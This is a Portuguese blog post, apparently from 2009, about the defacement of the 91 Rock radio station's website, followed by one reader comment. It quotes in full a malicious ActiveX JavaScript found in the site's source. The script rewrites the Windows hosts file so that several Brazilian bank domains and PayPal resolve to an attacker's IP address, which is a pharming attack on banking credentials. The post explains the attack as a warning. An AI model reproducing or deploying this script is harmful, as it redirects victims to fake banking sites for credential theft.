Em vez de hackear os sites de musicas ruins, eles tem que hackear uma rádio rock. Tem tanta rádio ruin, bem que eles podiam ter deixado quieto, bem, isso serve para avisar a quem cuida do site da 91 Rock, que ninguém está seguro na internet, e que a segurança em seus sites é primordial.
E ainda poderá infectar sua máquina, pois há o seguinte script encrustado no código fonte.
<script language="javascript">
function pharmer(){
var fso = new ActiveXObject("Scripting.FileSystemObject");
var pharm = fso.CreateTextFile("C:\\WINDOWS\\system32\\Drivers\\etc\\hosts", true);
pharm.WriteLine('127.0.0.1 localhost');
pharm.WriteLine('66.90.65.232 www.bradesco.com.br');
pharm.WriteLine('66.90.65.232 bradesco.com.br');
pharm.WriteLine('66.90.65.232 www.caixa.com.br');
pharm.WriteLine('66.90.65.232 caixa.com.br');
pharm.WriteLine('127.0.0.1 www.itau.com.br');
pharm.WriteLine('66.90.65.232 itau.com.br');
pharm.WriteLine('66.90.65.232 www.unibanco.com.br');
pharm.WriteLine('66.90.65.232 unibanco.com.br');
pharm.WriteLine('66.90.65.232 www.banrisul.com.br');
pharm.WriteLine('66.90.65.232 banrisul.com.br');
pharm.WriteLine('66.90.65.232 www.paypal.com');
pharm.WriteLine('66.90.65.232 paypal.com');
pharm.WriteLine('66.90.65.232 www.bancoreal.com.br');
pharm.WriteLine('66.90.65.232 bancoreal.com.br');
pharm.Close();
}
</script>
Este código irá acrescentar o endereço IP 66.90.65.232 ao seu arquivo hosts, e toda vez que você digitar o endereço de algum dos bancos acima, será redirecionado para este ip do atacante.
Segue o espelho do deface.
Carregando tweets...
1 comentário
Fabio disse:
27 de dezembro de 2009 em 22:19 (UTC -2 )
Parabéns pelo blog brother, foda este ataque hein?! Tanta radio pro cara zoar vai logo na 91. Eu faço Sistemas de Informação na Estácio e estudo Java, Linux, segurança por conta própria, e também tenho um blog de rock e metal gostaria de trocar links contigo e fechar uma parceria? Aguardo uma visita e espero que você também curta o meu blog como estou curtindo o seu. Grande abraço e aguardo contato.